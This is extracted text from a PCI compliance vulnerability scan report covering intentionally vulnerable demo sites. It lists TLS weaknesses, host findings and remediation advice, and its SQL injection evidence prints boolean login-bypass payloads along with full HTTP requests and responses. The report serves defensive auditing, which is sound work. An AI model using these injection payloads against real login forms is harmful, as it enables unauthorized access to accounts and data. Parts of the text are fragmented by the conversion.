Ceh PDF
Date scan completed: 2019-08-05
Scan expiration date (90 days from date scan completed): N/A
Compliance status: Fail
Scan report type: Full Scan
Number of unique in-scope components scanned: 4
Number of identified failing vulnerabilities: 170
Number of components found by ASV but not scanned because scan customer confirmed they were out of scope: 13
Title Date
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 1 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cyclone.ciphertechs.com
port-evm-dv1-03.tw-test.net
Scan Customer Company: JS Int-B Roles 08052019
ASV Company: Trustwave Holdings, Inc.
Date Scan Completed: 2019-08-05
Scan Expiration Date: N/A
# | Component | Vulnerabilities Noted per Component | Severity Level | CVSS Score | Compliance Status | Exceptions, False Positives, or Compensating Controls (Noted by the ASV for this vulnerability)
1 | agent-av-mirror-inc.tw-test.net (MV PCI1) | Host Detected | Info | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
8 | crackme.cenzic.com (MV PCI2) | Service Detected | Info | 0.0 | Pass | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
Consolidated Solution/Correction Plan for the above Component:
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.
34 | demo.testfire.net (Jen's PCI Test) | Insecure or no Content-Security-Policy header | Info | 0.0 | Pass | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
• Ensure that all applications and services running on this host are configured to appropriately restrict access to sensitive information. This includes account information and configuration settings.
• Configure the SSL service(s) running on this host to adhere to information security best practices.
• Ensure that any web applications running on this host properly validate and transmit user input in a secure manner.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Ensure that any web applications running on this host are configured following industry security best practices.
48 | google-gruyere.appspot.com (MV PCI6) | SSLv2, SSLv3 and TLS v1.0 Vulnerable to CBC Attacks via chosen-plaintext (BEAST), CVE-2011-3389 | Medium | 4.3 | Out of Scope
49 | google-gruyere.appspot.com (MV PCI6) | System Responds to SYN+FIN TCP Packets | Low | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Configure the SSL service(s) running on this host to adhere to information security best practices.
76 | hackazon.webscantest.com (MV PCI7) | Apache HTTP Server before 2.4.11 allows remote attackers to cause a denial of service via null pointer, CVE-2014-3581 | Medium | 5.0 | Out of Scope | Note to scan customer: This vulnerability is purely a denial-of-service vulnerability and it is not considered a failing condition under the PCI DSS.
3185
91 | hackazon.webscantest.com (MV PCI7) | Insecure configuration of Cookie attributes | Medium | 4.3 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
102 | hackazon.webscantest.com (MV PCI7) | SSL Perfect Forward Secrecy Supported | Info | 0.0 | Out of Scope
103 | hackazon.webscantest.com (MV PCI7) | Enumerated Applications | Info | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
Database.
webscantest.com
(MV PCI7)
Database.
webscantest.com
(MV PCI7)
115 | hackazon.webscantest.com (MV PCI7) | Insufficient or No use of Strict Transport Security header | Info | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
• Ensure that any web applications running on this host are configured following industry security best practices.
• Upgrade and/or install security updates for Apache HTTP Server.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Ensure that any web applications running on this host properly validate and transmit user input in a secure manner.
• Ensure that all applications and services running on this host are configured to appropriately restrict access to sensitive information. This includes account information and configuration settings.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• Upgrade and/or install security updates for jQuery.
126 | hackxor.sourceforge.net (MV PCI7) | Service Detected | Info | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
134 | hackxor.sourceforge.net (MV PCI7) | Host Detected | Info | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
• Ensure that any web applications running on this host are configured following industry security best practices.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• The version of Nginx is out of support by the vendor. Update to a supported version.
• Upgrade and/or install security updates for Nginx.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.
138 | jarlsberg.appspot.com (MV PCI9) | Block cipher algorithms with block size of 64 bits (like DES and 3DES) birthday attack known as Sweet32, CVE-2016-2183 | Medium | 5.0 | Out of Scope
139 | jarlsberg.appspot.com (MV PCI9) | SSLv2, SSLv3 and TLS v1.0 Vulnerable to CBC Attacks via chosen-plaintext (BEAST), CVE-2011-3389 | Medium | 4.3 | Out of Scope
140 | jarlsberg.appspot.com (MV PCI9) | System Responds to SYN+FIN TCP Packets | Low | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
(MV PCI9)
148 | jarlsberg.appspot.com (MV PCI9) | SSL Certificate Expiring Soon | Info | 0.0 | Out of Scope
Consolidated Solution/Correction Plan for the above Component:
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Configure the SSL service(s) running on this host to adhere to information security best practices.
150 | pentesteracademylab.appspot.com (MV PCI10) | Block cipher algorithms with block size of 64 bits (like DES and 3DES) birthday attack known as Sweet32, CVE-2016-2183 | Medium | 5.0 | Out of Scope
151 | pentesteracademylab.appspot.com (MV PCI10) | SSLv2, SSLv3 and TLS v1.0 Vulnerable to CBC Attacks via chosen-plaintext (BEAST), CVE-2011-3389 | Medium | 4.3 | Out of Scope
158 | pentesteracademylab.appspot.com (MV PCI10) | SSL Certificate Expiring Soon | Info | 0.0 | Out of Scope
159 | pentesteracademylab.appspot.com (MV PCI10) | SSL-TLS Certificate Information | Info | 0.0 | Out of Scope | Note to scan customer: This vulnerability is not recognized in the National Vulnerability Database.
Consolidated Solution/Correction Plan for the above Component:
• Configure the SSL service(s) running on this host to adhere to information security best practices.
Consolidated Solution/Correction Plan for the above Component:
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.
Note
confirm that this code is obtained from a trusted source, that the embedded links redirect to a trusted source, and that the code is implemented securely, or 2) confirm that the code has been removed. Consult your ASV if you have questions about this Special Note.
Unknown services
Note to scan customer: Unidentified services have been detected. Due to increased risk to the cardholder data environment, identify the service, then either 1) justify the business need for this service and confirm it is securely implemented, or 2) identify the service and confirm that it is disabled. Consult your ASV if you have questions about this Special Note.
crackme.cenzic.com / MV PCI2
ioc-signatures-inc.tw-test.net / MV PCI8
port-app-dv1-01.tw-test.net / MV PCI11
agent-av-mirror-inc.tw-test.net (MV PCI1) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
crackme.trustwave.com (MV PCI3) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
crackmebank.campbell.devlab (MV PCI4) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
cyclone.ciphertechs.com -- These hosts were not visible and the scanner was unable to decide on the overall security of the environment per PCI ASV requirements.
google-gruyere.appspot.com (MV PCI6) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
hackazon.webscantest.com (MV PCI7) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
hackxor.sourceforge.net (MV PCI7) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
jarlsberg.appspot.com (MV PCI9) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
pentesteracademylab.appspot.com (MV PCI10) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
port-app-dv1-02.tw-test.net (MV PCI12) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
port-app-dv2-02.tw-test.net (MV PCI13) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
port-evm-dv1-03.tw-test.net -- These hosts were not visible and the scanner was unable to decide on the overall security of the environment per PCI ASV requirements.
port-rly-dv3-01.tw-test.net (MV PCI15) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
The following issues were identified during this scan. Please review all items and address all items that affect compliance or the security of your system.
In the tables below you can find the following information about each TrustKeeper finding.
• CVE Number - The Common Vulnerabilities and Exposure number(s) for the detected vulnerability - an industry standard for cataloging vulnerabilities. A comprehensive list of CVEs can be found at nvd.nist.gov or cve.mitre.org.
• Vulnerability - This describes the name of the finding, which usually includes the name of the application or operating system that is vulnerable.
• CVSS Score - The Common Vulnerability Scoring System is an open framework for communicating the characteristics and impacts of IT vulnerabilities. Further information can be found at www.first.org/cvss or nvd.nist.gov/cvss.cfm.
• Severity - This identifies the risk of the vulnerability. It is closely associated with the CVSS score.
• Compliance Status - Findings that are PCI compliance violations are indicated with a Fail status. In order to pass a vulnerability scan, these findings must be addressed. Most findings with a CVSS score of 4 or more, or a Severity of Medium or higher, will have a Fail status. Some exceptions exist, such as DoS vulnerabilities, which are not included in PCI compliance.
• Details - TrustKeeper provides the port on which the vulnerability is detected, details about the vulnerability, links to available patches and other specific guidance on actions you can take to address each vulnerability.
For more information on how to read this section and the scoring methodology used, please refer to the appendix.
1 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
2 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: agent-av-mirror-inc.tw-test.net
ip_address: 10.70.244.28
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Evidence:
application_protocol: ntp
ip_address: 204.13.201.47
port_number: 123
transport_protocol: udp
4 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackme.cenzic.com
ip_address: 204.13.201.47
5 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackme.cenzic.com
ip_address: 204.13.201.47
6 Unknown services found 0.0 Info Pass The finding reports all ports and protocols that couldn't be remotely
identified. Particular items may indicate uncommon but safe protocols
or an in-house application that uses a custom and/or proprietary protocol.
However, they can also indicate malicious activity (backdoors,
rootkits, any other types of malware). This finding is purely
informational.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Unknown Service: transport protocol: tcp, port: 80, ssl: false, banner:
(N/A)
Unknown Service: transport protocol: tcp, port: 443, ssl: false, banner:
(N/A)
Remediation:
Review items mentioned in this finding one by one and ensure the
services are known and accounted for in your security plan.
7 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 204.13.201.47
os_name: embedded
Synchronized The NTP service on this server does not appear to be synchronized
based on its Leap Indicator error status.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Remediation:
Ensure the NTP server is properly synced with an authoritative time
source.
Evidence:
ip_address: 204.13.201.47
port_number: 80
transport_protocol: tcp
Evidence:
ip_address: 204.13.201.47
port_number: 443
transport_protocol: tcp
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
SYN+FIN TCP Packets This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
3 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:synology:rt1900ac
ip_address: 204.13.201.47
os_name: embedded
Synchronized The NTP service on this server does not appear to be synchronized
based on its Leap Indicator error status.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Remediation:
Ensure the NTP server is properly synced with an authoritative time
source.
Evidence:
ip_address: 204.13.201.47
port_number: 443
transport_protocol: tcp
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Evidence:
application_protocol: ntp
Evidence:
ip_address: 204.13.201.47
port_number: 80
transport_protocol: tcp
8 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackme.trustwave.com
ip_address: 204.13.201.47
9 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackme.trustwave.com
ip_address: 204.13.201.47
10 Unknown services found 0.0 Info Pass The finding reports all ports and protocols that couldn't be remotely
identified. Particular items may indicate uncommon but safe protocols
or an in-house application that uses a custom and/or proprietary protocol.
However, they can also indicate malicious activity (backdoors,
rootkits, any other types of malware). This finding is purely
informational.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Unknown Service: transport protocol: tcp, port: 80, ssl: false, banner:
(N/A)
Unknown Service: transport protocol: tcp, port: 443, ssl: false, banner:
(N/A)
Remediation:
Review items mentioned in this finding one by one and ensure the
services are known and accounted for in your security plan.
1 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackmebank.campbell.devlab
2 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackmebank.campbell.devlab
ip_address: 10.76.128.61
cyclone.ciphertechs.com
# CVE Number Vulnerability CVSS Score Severity Compliance Status Details
1 Hostname could not be Resolved 0.0 Low Fail This hostname's IP address could not be resolved using DNS resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
https://www3.trustwave.com/support/kb/KnowledgebaseArticle20965.aspx
Remediation:
Make sure you have correctly entered the fully qualified domain name
for the host you are trying to scan. Consider working with your ISP (or
your IT network manager, if this is an internal scan) to validate that
DNS is configured correctly.
This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
https://www.pcisecuritystandards.org/documents/Migrating_from_SSL_Early_TLS_Information%20Supplement_v1.pdf
https://www.pcisecuritystandards.org/pdfs/15_04_15%20PCI%20DSS%203%201%20Press%20Release.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/Bring-Out-Your-Dead--An-Update-on-the-PCI-relevance-of-SSLv3/?page=1&year=0&month=0
https://www3.trustwave.com/support/vulnerabilitymanagement/tls/
Evidence:
Remediation:
The server should be configured to disable the use of the TLSv1.0
protocol in favor of cryptographically stronger protocols such as
TLSv1.1 and TLSv1.2. For services that already support TLSv1.1 or
TLSv1.2, simply disabling the use of the TLSv1.0 protocol on this
service is sufficient to address this finding. Please note the port
associated with this finding. This finding may NOT be originating from
port 443, which is what most online testing tools check by default.
NOTE: as of June 30th, 2018, Risk Mitigation & Migration plans were not
considered a PCI exception to this finding: the instance of SSLv3 must
be remediated properly.
This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
https://www.pcisecuritystandards.
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Remediation:
The server should be configured to disable the use of the TLSv1.0
protocol in favor of cryptographically stronger protocols such as
TLSv1.1 and TLSv1.2. For services that already support TLSv1.1 or
TLSv1.2, simply disabling the use of the TLSv1.0 protocol on this
service is sufficient to address this finding. Please note the port
associated with this finding. This finding may NOT be originating from
port 443, which is what most online testing tools check by default.
NOTE: as of June 30th, 2018, Risk Mitigation & Migration plans were not
considered a PCI exception to this finding: the instance of SSLv3 must
be remediated properly.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net:8080/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:33:42 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:33:43 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net:8443/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:37:47 GMT
Connection: close
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:37:47 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net:8443/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:37:44 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
